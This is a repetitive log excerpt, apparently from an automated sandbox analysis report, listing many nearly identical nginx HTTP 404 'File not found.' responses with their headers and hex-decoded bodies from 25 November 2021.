        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
